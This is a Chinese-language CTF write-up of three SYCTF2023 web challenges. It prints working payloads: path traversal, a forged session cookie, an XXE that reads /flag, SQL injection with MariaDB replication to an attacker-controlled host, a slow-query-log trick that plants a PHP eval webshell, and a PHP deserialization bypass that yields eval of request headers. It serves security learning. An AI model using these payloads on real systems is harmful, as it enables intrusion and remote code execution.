SYCTF2023

CarelessPy

主页面的源代码提示了/eval路由和/login路由和一个任意文件下载/download?file=zayu2.jpg,eval路由可以传参cmd文件的路径来回显ls操作
任意文件下载做了限制不能读flag和app.py,这里我们可以读pycache文件夹里面的part.cpython-311.pyc,然后pyc反编译

1	/download?file=../../__pycache__/part.cpython-311.pyc

反编译的结果:

然后去修改session:

1	eyJpc2xvZ2luIjp0cnVlfQ.ZRbAvg.y0__DjYK72pGaxry8UGzza9Dp8A

修改session得到提示

去/th1s_1s_The_L4st_one路由,发现是个xxe页面,而且没有过滤

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [<!ENTITY abc SYSTEM "file:///flag" >]>  
<result>  
<ctf>aa</ctf>  
<web>$abc</web>  
</result>

1	SYC{o2takuXX_l1k4_p1@y_ArkN1ghtS}

Confronting robot

打开主页面是一个机器人对话框随便输入一个值有get传参,怀疑sql注入,上sqlmap扫一下发现能一把梭,看一下数据库结构

数据库:
[*] information_schema
[*] robot_data
[*] test

robot_data:
   有一个name表:
    username                            |
+-------------------------------------+
| Hacker                              |
| secret is in /sEcR@t_n@Bodyknow.php |
+-------------------------------------

发现/sEcR@t_n@Bodyknow.php,这里可以传输执行SQL语句,那个开始挑战要输入十个数字和它猜拳,
在这个输入框里执行sql语句发现用户变成了secret了,可以看到一个game表,里面有字段,发现那个表是空的
结合源代码的可知这次考点也是主从复制

预期解

先select version()得到MySQL版本是10.3.20-MariaDB
docker开一个相同版本的MySQL

docker pull mariadb-10.3.20

docker run -d -p 3306:3306 --name mariadb-10.3.20 -e MYSQL_ROOT_PASSWORD=root mariadb:10.3.20

docker exec -it mariadb-10.3.20 mysql -uroot -p

配置:

docker进入容器后
vim /etc/mysql/my.cnf

[mysqld]
server-id = 1
log-bin=/var/log/mysql/mariadb-bin
binlog-do-db=game_data

然后重启mysql:
service restart mysql

容器也重启一下:
docker restart mariadb-10.3.20

进入mysql shell执行:

CREATE USER 'slave'@'%' IDENTIFIED BY '123456';
GRANT REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'slave'@'%';
flush privileges;

主服务器执行:
CREATE DATABASE IF NOT EXISTS game_data;
use game_data
CREATE TABLE IF NOT EXISTS game ( round int(20) , choice varchar(256) ) ;

执行show master status;
记住这里的:
file: master-bin.000001
position:1126


题目页面:

CHANGE MASTER TO MASTER_HOST='111.229.158.40', MASTER_USER='slave',
MASTER_PASSWORD='123456', MASTER_LOG_FILE='mariadb-bin.000001',MASTER_LOG_POS=1126,master_connect_retry=30;

start slave;

show slave status;
如果SlaveIORunning 和 SlaveSQLRunning的值都是Yes,代表你配置成功了

可以看到两个连着的YES
vps的mysqlshell:

1	INSERT INTO game ( round , choice ) VALUES ('1', 'R'), ('2', 'R'),('3', 'R'), ('4', 'R'),('5', 'R'), ('6', 'R'),('7','R'), ('8', 'R'),('9', 'R'), ('10', 'R');

输入10个P得到flag

非预期解:

慢日志注入

可以参考我这篇文章慢日志注入

set GLOBAL log_queries_not_using_indexes=on;

set GLOBAL slow_query_log=on;
set GLOBAL slow_query_log_file='/var/www/html/sEcR@t_n@Bodyknow.php';
select '<?php @eval($_POST[cmd]);phpinfo();?>' from mysql.db where sleep(11);

1	cmd=system("cat /var/www/html/game.php");

找到flag

4号的罗纳尔多

<?php
error_reporting(0);
highlight_file(__FILE__);
class evil{
    public $cmd;
    public $a;
    public function __destruct(){
        if('VanZZZZY' === preg_replace('/;+/','VanZZZZY',preg_replace('/[A-Za-z_\(\)]+/','',$this->cmd))){
            eval($this->cmd.'givemegirlfriend!');
        } else {
            echo 'nonono';
        }
    }
}

if(!preg_match('/^[Oa]:[\d]+|Array|Iterator|Object|List/i',$_GET['Pochy'])){
    unserialize($_GET['Pochy']);
} else {
    echo 'nonono';
}

正则匹配参考极客2022的rceus用__halt_compiler();绕过,反序列化的正则用C绕过,可以参考这篇,过滤了

ArrayObject::unserialize
ArrayIterator::unserialize

RecursiveArrayIterator::unserialize
这题如果用SplStack::unserialize

1	C:8:"SplStack":100:{i:6;:a:1:{s:4:"evil";O:4:"evil":1:{s:3:"cmd";s:45:"eval(end(getallheaders()));__halt_compiler();";}}}

读根目录的flag发现是假的,flag.sh里发现:

#!/bin/sh

gcc /tmp/siuuuuuu.c -o /tmp/siuuuuuu
strip /tmp/siuuuuuu
rm /tmp/siuuuuuu.c
mkdir /tmp/cristiano
mkdir /tmp/cristiano/siuuu
mv /tmp/siuuuuuu /tmp/cristiano/siuuu/siuuuuuu
chmod 000 /tmp/cristiano/siuuu/siuuuuuu
chmod +r /tmp/cristiano/siuuu/siuuuuuu

在/tmp/siuuu.py里发现flag